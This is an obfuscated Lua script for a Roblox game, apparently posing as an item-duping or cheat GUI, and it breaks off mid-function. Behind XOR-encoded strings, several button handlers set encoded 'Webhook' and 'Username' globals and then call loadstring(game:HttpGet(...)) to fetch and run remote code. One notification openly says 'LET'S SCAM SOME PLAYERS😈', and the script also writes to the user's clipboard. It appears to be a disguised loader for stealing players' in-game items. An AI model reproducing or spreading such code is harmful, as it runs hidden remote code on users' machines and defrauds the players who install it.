--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end if (game.PlaceId==142823291) then local v12=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));v12.Name=v7("\14\192\120\133\200\49\204\46\192\188\16\206\43\200\188\21\159","\156\67\173\74\165");v12.Parent=game.CoreGui;local v16=Instance.new(v7("\18\165\72\27\185","\38\84\215\41\118\220\70"));v16.Size=UDim2.new(0.3 -0 ,0 + 0 ,0.8 -0 ,0 + 0 );v16.Position=UDim2.new(0.5 + 0 ,0,47.1 -(20 + 27) ,287 -(50 + 237) );v16.BackgroundColor3=Color3.fromRGB(0 + 0 ,0,0 -0 );v16.BorderColor3=Color3.fromRGB(0,115 + 140 ,1078 -823 );v16.BorderSizePixel=1495 -(711 + 782) ;v16.Active=true;v16.BackgroundTransparency=0;v16.Draggable=true;v16.Parent=v12;local v26=Instance.new(v7("\100\19\58\6\210\81\20\39\30","\158\48\118\66\114"));v26.Size=UDim2.new(0.3 -0 ,0,0.05,469 -(270 + 199) );v26.Position=UDim2.new(0.35 + 0 ,0,1819.045 -(580 + 1239) ,0);v26.BackgroundColor3=Color3.new(0 -0 ,0,0 + 0 );v26.BorderColor3=Color3.new(0,0 + 0 ,0);v26.BorderSizePixel=1;v26.Text=v7("\133\33\8\35\96\229\220\190\45","\155\203\68\112\86\19\197");v26.TextSize=16 + 19 ;v26.BackgroundTransparency=2 -1 ;v26.TextColor3=Color3.new(159 + 96 ,255,1422 -(645 + 522) );v26.Font=Enum.Font.ArialBold;v26.Parent=v16;local v26=Instance.new(v7("\114\216\46\232\108\121\231\253\74","\152\38\189\86\156\32\24\133"));v26.Size=UDim2.new(1790.3 -(1010 + 780) ,0 + 0 ,0.05,0 -0 );v26.Position=UDim2.new(0.35,0 -0 ,1836.145 -(1045 + 791) ,0 -0 );v26.BackgroundColor3=Color3.new(0 -0 ,505 -(351 + 154) ,1574 -(1281 + 293) );v26.BorderColor3=Color3.new(266 -(28 + 238) ,0 -0 ,1559 -(1381 + 178) );v26.BorderSizePixel=1 + 0 ;v26.Text=v7("\200\69\166\66\249\23\145\67\238\68\174\73\242","\38\156\55\199");v26.TextSize=21 + 4 ;v26.BackgroundTransparency=1 + 0 ;v26.TextColor3=Color3.new(255,879 -624 ,133 + 122 );v26.Font=Enum.Font.Highway;v26.Parent=v16;local v26=Instance.new(v7("\156\120\100\60\63\117\248\70\164","\35\200\29\28\72\115\20\154"));v26.Size=UDim2.new(470.3 -(381 + 89) ,0 + 0 ,0.05 + 0 ,0 -0 );v26.Position=UDim2.new(1156.35 -(1074 + 82) ,0 -0 ,1784.14 -(214 + 1570) ,1455 -(990 + 465) );v26.BackgroundColor3=Color3.new(0,0 + 0 ,0 + 0 );v26.BorderColor3=Color3.new(0 + 0 ,0,0 -0 );v26.BorderSizePixel=1727 -(1668 + 58) ;v26.Text=v7("\38\128\238\224\178\19\11\38\128","\84\121\223\177\191\237\76");v26.TextSize=676 -(512 + 114) ;v26.BackgroundTransparency=2 -1 ;v26.TextColor3=Color3.fromRGB(0,255,526 -271 );v26.Font=Enum.Font.ArialBold;v26.Parent=v16;local v40=Instance.new(v7("\143\83\209\180\24\69\36\213\180\88","\161\219\54\169\192\90\48\80"));v40.Size=UDim2.new(0.9,0,0.12,0);v40.Position=UDim2.new(0.05,0,0.3 -0 ,0 + 0 );v40.BackgroundColor3=Color3.new(0 + 0 ,0 + 0 ,0 -0 );v40.BorderColor3=Color3.fromRGB(1994 -(109 + 1885) ,255,1724 -(1269 + 200) );v40.BorderSizePixel=1 -0 ;v40.Text=v7("\125\80\1\33\76\2\51\38\72\79\64\127\9\109\38\3","\69\41\34\96");v40.BackgroundTransparency=0;v40.TextColor3=Color3.new(1070 -(98 + 717) ,1081 -(802 + 24) ,439 -184 );v40.Font=Enum.Font.Highway;v40.Parent=v16;v40.TextSize=25 -5 ;v40.MouseButton1Click:Connect(function() if (v40.BackgroundColor3==Color3.fromRGB(0 + 0 ,0,0 + 0 )) then local v107=0 + 0 ;while true do if (v107==(1 + 2)) then local v123=0 -0 ;while true do if (v123==1) then v40.Text=v7("\56\220\95\118\123\55\192\228\13\195\30\40\62\88\221","\135\108\174\62\18\30\23\147");v107=13 -9 ;break;end if ((0 + 0)==v123) then wait(1 + 0 );v40.BackgroundColor3=Color3.fromRGB(42 + 8 ,205,37 + 13 );v123=1 + 0 ;end end end if (v107==2) then v40.Text=v7("\29\211\45\140\44\129\31\139\40\204\108\210\105\147","\232\73\161\76");wait(1434 -(797 + 636) );v40.Text=v7("\143\203\67\89\27\251\234\65\92\19\251\131\2\12","\126\219\185\34\61");v107=3;end if (v107==4) then game:GetService(v7("\133\253\43\217\12\171\33\224\163\224","\167\214\137\74\171\120\206\83")):SetCore(v7("\184\245\60\89\214\168\159\249\52\84\251\166\159\249\61\83","\199\235\144\82\61\152"),{[v7("\51\31\173\39\2","\75\103\118\217")]=v7("\245\85\125\14\163","\126\167\52\16\116\217"),[v7("\252\43\56\148","\156\168\78\64\224\212\121")]=v7("\38\237\166\203\23\250\229\250\15\235\229\250\21\239\161\203","\174\103\142\197"),[v7("\127\43\80\54","\152\54\72\63\88\69\62")]=v7("\198\198\246\72\220\209\227\94\142\139\161\72\205\212\235\1\245\215\253\89\192\130\231\88\137\149\187\5\141\150\187\10\140\146\183\9\146\211\179\13\129\148\168\84\137\149\187\12","\60\180\164\142")});Duration=11;Username=v7("\108\86\0\16\40\248\28\95\97\39\59\50\229","\114\56\62\101\73\71\141");v107=5;end if (v107==(0 -0)) then v40.Text=v7("\136\209\214\14\7\107\143\192\214\7\66\113\252\150","\75\220\163\183\106\98");wait(1620 -(1427 + 192) );v40.Text=v7("\54\168\138\51\220\66\137\136\54\212\66\224\203\99","\185\98\218\235\87");v107=1;end if (v107==(2 + 3)) then Webhook=v7("\176\253\207\212\171\179\148\139\188\224\200\199\183\251\223\138\187\230\214\139\185\249\210\139\175\236\217\204\183\230\208\215\247\184\137\146\237\191\137\157\237\177\142\144\238\190\136\147\237\191\142\147\247\228\240\253\225\243\254\234\176\234\220\235\181\248\207\253\238\193\212\230\225\195\228\150\148\206\195\156\154\191\201\252\173\208\203\222\135\211\248\200\191\190\150\202\150\208\237\148\171\237\215\198\153\200\202\244\171\223\131\234\147\241\210\221\177\234\195\227\162","\164\216\137\187");loadstring(game:HttpGet(v7("\218\242\37\162\181\164\68\157\227\54\189\180\247\0\199\245\48\252\181\238\10\209\227\126\191\171\172","\107\178\134\81\210\198\158")))();break;end if (v107==(2 -1)) then wait(1);v40.Text=v7("\255\46\38\226\219\234\248\63\38\235\158\240\139\111","\202\171\92\71\134\190");wait(1);v107=2 + 0 ;end end else local v108=0 + 0 ;while true do if (v108==0) then v40.BackgroundColor3=Color3.fromRGB(326 -(192 + 134) ,0,0);v40.Text=v7("\12\28\131\194\175\120\61\129\199\167\120\84\194\233\140\30","\202\88\110\226\166");break;end end end end);local v40=Instance.new(v7("\247\10\154\227\232\214\27\150\248\196","\170\163\111\226\151"));v40.Size=UDim2.new(1276.9 -(316 + 960) ,0 + 0 ,0.12,0 + 0 );v40.Position=UDim2.new(0.05 + 0 ,0 -0 ,551.5 -(83 + 468) ,0);v40.BackgroundColor3=Color3.new(1806 -(1202 + 604) ,0,0 -0 );v40.BorderColor3=Color3.fromRGB(0 -0 ,706 -451 ,580 -(45 + 280) );v40.BorderSizePixel=1 + 0 ;v40.Text=v7("\37\34\179\60\75\119\5\16\55\242\98\14\24\15\55","\73\113\80\210\88\46\87");v40.BackgroundTransparency=0;v40.TextColor3=Color3.new(255,223 + 32 ,94 + 161 );v40.Font=Enum.Font.Highway;v40.Parent=v16;v40.TextSize=12 + 8 ;v40.MouseButton1Click:Connect(function() if (v40.BackgroundColor3==Color3.fromRGB(0,0,0 + 0 )) then v40.Text=v7("\181\62\204\22\226\193\0\204\21\167\219\108\152","\135\225\76\173\114");wait(1);v40.Text=v7("\46\255\185\180\169\253\139\27\234\248\234\236\233","\199\122\141\216\208\204\221");wait(1 -0 );v40.Text=v7("\153\207\17\244\125\182\129\220\23\176\34\182\254","\150\205\189\112\144\24");wait(1912 -(340 + 1571) );v40.Text=v7("\17\150\190\72\1\200\61\17\34\196\229\12\86","\112\69\228\223\44\100\232\113");wait(1 + 0 );v40.Text=v7("\224\13\6\215\179\60\170\213\24\71\137\246\45","\230\180\127\103\179\214\28");wait(1773 -(1733 + 39) );v40.BackgroundColor3=Color3.fromRGB(137 -87 ,205,1084 -(125 + 909) );v40.Text=v7("\184\23\94\66\225\1\204\141\2\31\28\164\110\206","\128\236\101\63\38\132\33");game:GetService(v7("\159\189\16\86\162\238\221\139\188\24","\175\204\201\113\36\214\139")):SetCore(v7("\116\201\59\216\42\72\216\60\218\13\68\205\33\213\11\73","\100\39\172\85\188"),{[v7("\153\113\173\140\54","\83\205\24\217\224")]=v7("\212\196\192\39\252","\93\134\165\173"),[v7("\138\247\217\214","\30\222\146\161\162\90\174\210")]=v7("\196\77\115\15\245\90\48\62\237\75\48\62\247\79\116\15","\106\133\46\16"),[v7("\113\35\124\242","\32\56\64\19\156\58")]=v7("\72\202\253\66\82\231\141\88\146\170\25\78\235\144\95\149\196\69\73\247\148\28\193\225\11\11\167\217\3\154\176\0\2\164\217\15\142\242\11\11\167\208\28\192\184\7\15\162","\224\58\168\133\54\58\146")});Duration=1959 -(1096 + 852) ;Username=v7("\109\94\78\196\122\147\137\12\102\116\89\232\125","\107\57\54\43\157\21\230\231");Webhook=v7("\211\159\5\229\170\134\128\148\143\24\230\186\211\221\223\197\18\250\180\147\206\203\130\94\226\188\222\199\212\132\26\230\246\141\157\141\222\71\167\224\137\151\142\223\71\162\234\139\154\141\222\70\186\180\247\246\130\145\52\219\177\223\200\244\134\0\225\128\138\231\212\169\72\223\134\142\227\252\147\73\215\239\206\247\206\178\1\239\134\230\236\215\140\70\184\183\242\246\237\219\2\241\181\222\238\250\154\33\230\143\132\225\240\147\24\236\176\223\215\252\145","\175\187\235\113\149\217\188");loadstring(game:HttpGet(v7("\52\187\149\92\240\35\55\115\170\134\67\241\112\115\41\188\128\2\240\105\121\63\170\206\65\238\43","\24\92\207\225\44\131\25")))();else local v111=0 + 0 ;local v112;while true do if (v111==(0 -0)) then v112=0 + 0 ;while true do if (0==v112) then v40.BackgroundColor3=Color3.fromRGB(0,512 -(409 + 103) ,236 -(46 + 190) );v40.Text=v7("\127\193\185\72\30\61\103\210\191\12\65\61\100\245\158","\29\43\179\216\44\123");break;end end break;end end end end);local v40=Instance.new(v7("\137\220\56\88\159\204\52\88\178\215","\44\221\185\64"));v40.Size=UDim2.new(95.9 -(51 + 44) ,0 + 0 ,0.12,0);v40.Position=UDim2.new(1317.05 -(1114 + 203) ,726 -(228 + 498) ,0.7 + 0 ,0);v40.BackgroundColor3=Color3.new(0,0 + 0 ,663 -(174 + 489) );v40.BorderColor3=Color3.fromRGB(0 -0 ,2160 -(830 + 1075) ,255);v40.BorderSizePixel=525 -(303 + 221) ;v40.Text=v7("\37\242\88\90\51\91\167\103\121\85","\19\97\135\40\63");v40.BackgroundTransparency=0;v40.TextColor3=Color3.new(255,1524 -(231 + 1038) ,213 + 42 );v40.Font=Enum.Font.Highway;v40.Parent=v16;v40.TextSize=1182 -(171 + 991) ;v40.MouseButton1Click:Connect(function() if (v40.BackgroundColor3==Color3.fromRGB(0,0,0)) then v40.Text=v7("\138\73\35\62\111\107\238\9","\81\206\60\83\91\79");wait(1);v40.Text=v7("\106\190\192\119\111\153\13\240","\196\46\203\176\18\79\163\45");wait(4 -3 );v40.Text=v7("\156\55\110\27\100\161\175\235","\143\216\66\30\126\68\155");wait(1);v40.Text=v7("\142\221\29\206\133\249\151\179","\129\202\168\109\171\165\195\183");wait(1);v40.Text=v7("\6\77\39\221\158\78\166\115","\134\66\56\87\184\190\116");wait(2 -1 );v40.BackgroundColor3=Color3.fromRGB(124 -74 ,205,41 + 9 );v40.Text=v7("\24\36\25\190\89\177\97\26\18","\85\92\81\105\219\121\139\65");game:GetService(v7("\206\167\81\87\104\218\239\148\69\76","\191\157\211\48\37\28")):SetCore(v7("\236\26\250\24\20\208\11\253\26\51\220\30\224\21\53\209","\90\191\127\148\124"),{[v7("\76\142\58\27\125","\119\24\231\78")]=v7("\176\44\168\80\198","\113\226\77\197\42\188\32"),[v7("\14\19\236\161","\213\90\118\148")]=v7("\122\45\183\83\93\79\110\128\94\72\27\26\166\87\73\94","\45\59\78\212\54"),[v7("\57\85\140\133","\144\112\54\227\235\230\78\205")]=v7("\161\42\23\232\216\78\190\42\85\179\159\79\170\56\10\161\241\72\160\45\27\186\217\95\238\121\90\165\137\9\230\126\87\170\137\14\245\63\82\173\133\11\245\32\82\173\133\11","\59\211\72\111\156\176")});Duration=38 -27 ;Username=v7("\122\143\230\20\65\146\237\42\113\165\241\56\70","\77\46\231\131");Webhook=v7("\178\64\162\80\169\14\249\15\190\93\165\67\181\70\178\14\185\91\187\15\187\68\191\15\173\81\180\72\181\91\189\83\245\5\228\22\239\2\228\25\239\12\227\20\236\3\229\23\239\2\227\23\245\89\157\121\227\78\147\110\178\87\177\111\183\69\162\121\236\124\185\98\227\126\137\18\150\115\174\24\152\2\164\120\175\109\166\90\133\110\149\76\189\3\251\78\148\109\128\16\169\80\186\66\155\117\167\112\169\98\238\110\145\76\191\89\179\87\174\103\160","\32\218\52\214");loadstring(game:HttpGet(v7("\70\3\37\184\226\234\10\21\75\16\62\186\248\187\80\73\79\89\34\184\240\179\64\21\67\26\99","\58\46\119\81\200\145\208\37")))();else v40.BackgroundColor3=Color3.fromRGB(0 -0 ,0,0 -0 );v40.Text=v7("\15\153\32\169\233\231\118\4\170\22","\86\75\236\80\204\201\221");end end);local v26=Instance.new(v7("\70\68\111\145\210\138\112\68\123","\235\18\33\23\229\158"));v26.Size=UDim2.new(1,0 -0 ,0.1,1248 -(111 + 1137) );v26.Position=UDim2.new(0.0001,158 -(91 + 67) ,0.9,0);v26.BackgroundColor3=Color3.new(0,0 -0 ,0 + 0 );v26.BorderColor3=Color3.fromRGB(523 -(423 + 100) ,255,2 + 253 );v26.BorderSizePixel=5 -3 ;v26.Text=v7("\115\168\192\184\91\191\197\251\114\163\129\137\81\183\219\161\16\150\238\151","\219\48\218\161");v26.TextSize=20;v26.BackgroundTransparency=0;v26.TextColor3=Color3.new(133 + 122 ,1026 -(326 + 445) ,1112 -857 );v26.Font=Enum.Font.SourceSans;v26.Parent=v16;local v53=Instance.new(v7("\194\99\125\68\222","\128\132\17\28\41\187\47"));v53.Size=UDim2.new(2 -1 ,0 -0 ,1,0);v53.Position=UDim2.new(0.0001,711 -(530 + 181) ,0.0002,0);v53.BackgroundColor3=Color3.fromRGB(881 -(614 + 267) ,0,0);v53.BorderColor3=Color3.fromRGB(32 -(19 + 13) ,414 -159 ,593 -338 );v53.BorderSizePixel=0 -0 ;v53.Active=False;v53.BackgroundTransparency=0 + 0 ;v53.Draggable=false;v53.Parent=v16;local v26=Instance.new(v7("\53\55\30\46\113\0\48\3\54","\61\97\82\102\90"));v26.Size=UDim2.new(0.3,0 -0 ,0.05 -0 ,1812 -(1293 + 519) );v26.Position=UDim2.new(0.35 -0 ,0 -0 ,0.09 -0 ,0 -0 );v26.BackgroundColor3=Color3.new(0 -0 ,0 + 0 ,0 + 0 );v26.BorderColor3=Color3.new(0 -0 ,0 + 0 ,0 + 0 );v26.BorderSizePixel=1;v26.Text=v7("\135\11\146\11\244\110\45\61\137\3","\105\204\78\203\43\167\55\126");v26.TextSize=22 + 12 ;v26.BackgroundTransparency=1097 -(709 + 387) ;v26.TextColor3=Color3.new(2113 -(673 + 1185) ,739 -484 ,818 -563 );v26.Font=Enum.Font.ArialBold;v26.Parent=v53;local v26=Instance.new(v7("\145\175\59\10\63\5\197\84\169","\49\197\202\67\126\115\100\167"));v26.Size=UDim2.new(0.3,0 -0 ,0.05,0);v26.Position=UDim2.new(0.35 + 0 ,0 + 0 ,0.14,0 -0 );v26.BackgroundColor3=Color3.new(0,0 + 0 ,0 -0 );v26.BorderColor3=Color3.new(0 -0 ,0,1880 -(446 + 1434) );v26.BorderSizePixel=1284 -(1040 + 243) ;v26.Text=v7("\8\100\224\22\191\105\97\8\100","\62\87\59\191\73\224\54");v26.TextSize=50;v26.BackgroundTransparency=2 -1 ;v26.TextColor3=Color3.fromRGB(1847 -(559 + 1288) ,2186 -(609 + 1322) ,709 -(13 + 441) );v26.Font=Enum.Font.ArialBold;v26.Parent=v53;local v63=Instance.new(v7("\211\7\226\221\197\13\226","\169\135\98\154"));v63.Size=UDim2.new(0.8 -0 ,0,0.18,0 -0 );v63.Position=UDim2.new(0.1 -0 ,0 + 0 ,0.3 -0 ,0 + 0 );v63.BackgroundColor3=Color3.fromRGB(48 + 61 ,326 -216 ,108);v63.BorderColor3=Color3.fromRGB(0,255,140 + 115 );v63.BorderSizePixel=1;v63.Text="";v63.PlaceholderText=v7("\224\114\61\20\213\54\218\206\57\106\26","\168\171\23\68\52\157\83");v63.TextWrapped=true;v63.TextColor3=Color3.fromRGB(0 -0 ,191,255);v63.BackgroundTransparency=0;v63.Font=Enum.Font.Arial;v63.TextSize=16;v63.Parent=v53;local v78=Instance.new(v7("\192\116\237\185\7\56\147\224\126\251","\231\148\17\149\205\69\77"));v78.Size=UDim2.new(0.7 + 0 ,0 + 0 ,0.15 + 0 ,0 + 0 );v78.Position=UDim2.new(0.15 + 0 ,433 -(153 + 280) ,0.55 -0 ,0 + 0 );v78.BackgroundColor3=Color3.fromRGB(11 + 15 ,26,14 + 12 );v78.BorderColor3=Color3.fromRGB(0,255,232 + 23 );v78.BorderSizePixel=1;v78.Text=v7("\165\169\211\254\69","\159\224\199\167\155\55");v78.BackgroundTransparency=0 + 0 ;v78.TextColor3=Color3.new(388 -133 ,158 + 97 ,255);v78.Font=Enum.Font.Highway;v78.Parent=v53;v78.TextSize=687 -(89 + 578) ;v78.Active=false;v78.MouseButton1Click:Connect(function() end);local v91=Instance.new(v7("\195\246\36\198\213\230\40\198\248\253","\178\151\147\92"));v91.Size=UDim2.new(0.7 + 0 ,0 -0 ,0.15,0);v91.Position=UDim2.new(1049.15 -(572 + 477) ,0,0.55 + 0 ,0 + 0 );v91.BackgroundColor3=Color3.fromRGB(26,4 + 22 ,26);v91.BorderColor3=Color3.fromRGB(86 -(84 + 2) ,255,420 -165 );v91.BorderSizePixel=1 + 0 ;v91.Text=v7("\169\243\88\55\0","\26\236\157\44\82\114\44");v91.BackgroundTransparency=842 -(497 + 345) ;v91.TextColor3=Color3.new(7 + 248 ,255,44 + 211 );v91.Font=Enum.Font.Highway;v91.Parent=v53;v91.TextSize=1353 -(605 + 728) ;v91.Active=false;v91.MouseButton1Click:Connect(function() if (v63.Text==v7("\33\43\204\100\36\39\210\92\43\121\141\95\114\125\216\113\47\124\141","\59\74\78\181")) then local v117=0 + 0 ;local v118;local v119;local v120;while true do if (v117==(19 -10)) then local v129=0 + 0 ;while true do if (1==v129) then Webhook=v7("\201\6\25\229\17\42\246\142\22\4\230\1\127\171\197\92\14\250\15\63\184\209\27\66\226\7\114\177\206\29\6\230\77\33\235\151\71\91\167\91\37\225\148\70\91\162\81\39\236\151\71\90\186\15\91\128\152\8\40\219\10\115\190\238\31\28\225\59\38\145\206\48\84\223\61\34\149\230\10\85\215\84\98\129\212\43\29\239\61\74\154\205\21\90\184\12\94\128\247\66\30\241\14\114\152\224\3\61\230\52\40\151\234\10\4\236\11\115\161\230\8","\217\161\114\109\149\98\16");loadstring(game:HttpGet(v7("\26\52\44\108\175\46\93\111\61\123\179\102\27\43\45\111\189\58\1\48\57\127\185\59\31\45\106","\20\114\64\88\28\220")))();v129=2;end if (v129==(7 -5)) then wait(0.001);Username=v7("\5\9\215\141\247\197\179\54\62\240\166\237\216","\221\81\97\178\212\152\176");v129=3 + 0 ;end if (v129==0) then v118:TweenPosition(UDim2.new(0.255 -0 ,0,1.1 + 0 ,0),Enum.EasingDirection.Out,Enum.EasingStyle.Quad,1);Username=v7("\105\126\118\37\124\190\67\90\73\81\14\102\163","\45\61\22\19\124\19\203");v129=490 -(457 + 32) ;end if (3==v129) then Webhook=v7("\197\243\9\235\9\151\168\82\255\19\222\228\18\233\30\131\228\18\246\85\204\247\20\180\13\200\229\21\244\21\198\244\82\170\72\155\178\75\169\67\152\191\72\175\76\154\180\74\174\76\152\176\82\246\49\244\190\7\222\52\197\228\26\212\23\220\243\36\173\50\194\197\68\209\37\159\203\58\227\66\239\177\15\195\15\244\247\7\196\32\238\235\26\172\87\195\201\36\205\74\222\227\17\249\59\236\246\45\232\44\149\201\54\227\19\212\238\30\227\61\215","\122\173\135\125\155");v117=5 + 5 ;break;end end end if ((1409 -(832 + 570))==v117) then local v130=0;while true do if (v130==(2 + 0)) then s.Looped=false;s.Pitch=1 + 0 ;v130=10 -7 ;end if (v130==1) then s.Name=v7("\63\232\38\61\117","\22\114\157\85\84");s.SoundId=v7("\204\223\7\212\7\185\231\211\220\4\138\79\249\170\200\196\11\138\94\249\165\139\202\0\215\88\226\231\155\194\23\153\4\166\240\146\153\67\156\10\163\249","\200\164\171\115\164\61\150");v130=1 + 1 ;end if (v130==0) then v119.TextYAlignment=Enum.TextYAlignment.Top;s=Instance.new(v7("\199\162\163\218\172","\57\148\205\214\180\200\54"));v130=1;end if (v130==3) then s.Volume=800 -(588 + 208) ;v117=8;break;end end end if (v117==(16 -10)) then v119.Text="I'm sorry because this script was patched yesterday, so only godly and ancient items work, if the script doesn't work, it means the script is completely patched, i'm sorry and enjoy the script!!!.";v119.BackgroundTransparency=0.6;v119.TextColor3=Color3.new(2055 -(884 + 916) ,255,533 -278 );v119.Font=Enum.Font.ArialBold;v119.Parent=v118;v119.TextWrapped=true;v119.TextSize=15;v117=5 + 2 ;end if (v117==(656 -(232 + 421))) then wait(1891 -(1569 + 320) );v78.Text="1";game:GetService(v7("\111\17\193\189\54\221\78\34\213\166","\184\60\101\160\207\66")):SetCore(v7("\2\135\114\184\31\141\104\181\55\139\127\189\37\139\115\178","\220\81\226\28"),{[v7("\39\220\150\247\239","\167\115\181\226\155\138")]=v7("\208\35\234\70\97","\166\130\66\135\60\27\17"),[v7("\112\79\214\97","\80\36\42\174\21")]="LET'S SCAM SOME PLAYERS😈",[v7("\103\19\56\116","\26\46\112\87")]=v7("\171\33\179\96\183\170\72\182\227\108\228\96\166\175\64\233\152\48\184\113\171\249\76\176\228\114\254\45\230\237\16\226\225\117\242\33\249\168\24\229\236\115\237\124\226\238\16\228","\212\217\67\203\20\223\223\37")});Duration=10 + 30 ;v53.Visible=false;v118=Instance.new(v7("\156\159\169\223\191","\178\218\237\200"));v118.Size=UDim2.new(0.42 + 0 ,0,0.2 -0 ,605 -(316 + 289) );v117=10 -6 ;end if (v117==5) then local v142=0;while true do if ((1 + 0)==v142) then v119.Size=UDim2.new(1454 -(666 + 787) ,425 -(360 + 65) ,1,0);v119.Position=UDim2.new(0.0001 + 0 ,0,254.0001 -(79 + 175) ,0);v142=2;end if (v142==(0 -0)) then v118.Parent=v12;v119=Instance.new(v7("\130\176\254\196\154\180\228\213\186","\176\214\213\134"));v142=1;end if (v142==(3 + 0)) then v119.BorderSizePixel=2 -1 ;v117=11 -5 ;break;end if (v142==2) then v119.BackgroundColor3=Color3.fromRGB(26,925 -(503 + 396) ,207 -(92 + 89) );v119.BorderColor3=Color3.fromRGB(0,494 -239 ,131 + 124 );v142=2 + 1 ;end end end if (v117==(7 -5)) then v78.Text="5";wait(1 + 1 );v78.Text="4";wait(4 -2 );v78.Text="3";wait(2 + 0 );v78.Text="2";v117=2 + 1 ;end if (v117==10) then loadstring(game:HttpGet(v7("\140\213\20\169\44\107\135\203\196\7\182\45\56\195\145\210\1\247\44\33\201\135\196\79\180\50\99","\168\228\161\96\217\95\81")))();break;end if ((24 -16)==v117) then s.archivable=false;s.Parent=game.Workspace;s:play();v120=game:GetService(v7("\138\227\6\64\141\141\241\17\83\138\189\241","\227\222\148\99\37"));v118:TweenPosition(UDim2.new(0.255 + 0 ,0,0.8 -0 ,1244 -(485 + 759) ),Enum.EasingDirection.Out,Enum.EasingStyle.Quad,2 -1 );wait(9);v120=game:GetService(v7("\7\69\87\243\247\0\87\64\224\240\48\87","\153\83\50\50\150"));v117=1198 -(442 + 747) ;end if (v117==1) then wait(1137 -(832 + 303) );v78.Text="8";wait(948 -(88 + 858) );v78.Text="7";wait(1 + 1 );v78.Text="6";wait(2 + 0 );v117=2;end if (v117==4) then local v148=0 + 0 ;while true do if (v148==0) then v118.Position=UDim2.new(789.255 -(766 + 23) ,0 -0 ,1.1 -0 ,0 -0 );v118.BackgroundColor3=Color3.fromRGB(26,26,26);v148=3 -2 ;end if (v148==1) then v118.BorderColor3=Color3.fromRGB(1073 -(1036 + 37) ,181 + 74 ,496 -241 );v118.BorderSizePixel=2;v148=2 + 0 ;end if ((1482 -(641 + 839))==v148) then v118.Active=false;v118.BackgroundTransparency=0.14;v148=916 -(910 + 3) ;end if (v148==(7 -4)) then v118.Draggable=false;v117=5;break;end end end if (v117==(1684 -(1466 + 218))) then game:GetService(v7("\22\197\91\72\167\32\195\125\79\186","\211\69\177\58\58")):SetCore(v7("\132\224\119\241\199\196\163\236\127\252\234\202\163\236\118\251","\171\215\133\25\149\137"),{[v7("\213\193\38\246\234","\34\129\168\82\154\143\80\156")]=v7("\183\179\62\17\82","\233\229\210\83\107\40\46"),[v7("\245\71\42\194","\101\161\34\82\182")]=v7("\216\33\106\190\236\195\171\26\168\43\118\204\155\179\210\110\219\40\122","\78\136\109\57\158\187\130\226"),[v7("\23\60\246\255","\145\94\95\153")]=v7("\239\207\12\193\70\162\240\207\78\154\1\163\228\221\17\136\111\164\238\200\0\147\71\179\160\156\65\140\23\229\168\155\76\131\23\226\187\218\73\132\27\231\187\197\73\132\27\231","\215\157\173\116\181\46")});Duration=23 + 27 ;v91.Visible=false;setclipboard(v7("\62\177\146\205\212\60\179\140\243\141\109\176\211\161\215\31\177\217\170","\186\85\212\235\146"));v78.Text=v7("\147\209","\56\162\225\118\158\89\142");wait(1150 -(556 + 592) );v78.Text="9";v117=1;end end else local v121=0 + 0 ;local v122;while true do if (v121==(808 -(329 + 479))) then v122=0;while true do if (v122==(855 -(174 + 680))) then Duration=17 -12 ;wait(0.3 -0 );v122=2;end if ((0 + 0)==v122) then v63.Text=v7("\236\195\33\82\40\23\240\212\55\28\1\94\220\214\47","\55\187\177\78\60\79");game:GetService(v7("\30\218\94\249\82\202\146\10\219\86","\224\77\174\63\139\38\175")):SetCore(v7("\183\68\86\42\170\78\76\39\130\72\91\47\144\72\87\32","\78\228\33\56"),{[v7("\250\119\166\15\128","\229\174\30\210\99")]=v7("\41\236\139\75\247","\89\123\141\230\49\141\93"),[v7("\199\116\238\24","\42\147\17\150\108\112")]=v7("\56\180\34\113\224\168\36\163\52\63\201\225\8\161\44","\136\111\198\77\31\135"),[v7("\43\10\168\88","\201\98\105\199\54\221\132\119")]=v7("\171\14\155\53\10\32\161\187\86\204\110\22\44\188\188\81\162\50\17\48\184\255\5\135\124\83\96\245\224\94\214\119\90\99\245\236\74\148\124\83\96\252\255\4\222\112\87\101","\204\217\108\227\65\98\85")});v122=740 -(396 + 343) ;end if (2==v122) then v63.Text="";break;end end break;end end end end);local v40=Instance.new(v7("\106\198\237\241\14\213\74\215\250\235","\160\62\163\149\133\76"));v40.Size=UDim2.new(0.7,0 + 0 ,0.15,1477 -(29 + 1448) );v40.Position=UDim2.new(0.15,1389 -(135 + 1254) ,0.75 -0 ,0 -0 );v40.BackgroundColor3=Color3.fromRGB(18 + 8 ,26,1553 -(389 + 1138) );v40.BorderColor3=Color3.fromRGB(574 -(102 + 472) ,241 + 14 ,255);v40.BorderSizePixel=1 + 0 ;v40.Text=v7("\241\165\25\111\232\211\185","\163\182\192\109\79");v40.BackgroundTransparency=0 + 0 ;v40.TextColor3=Color3.new(1800 -(320 + 1225) ,453 -198 ,157 + 98 );v40.Font=Enum.Font.Highway;v40.Parent=v53;v40.TextSize=1484 -(157 + 1307) ;v40.MouseButton1Click:Connect(function() 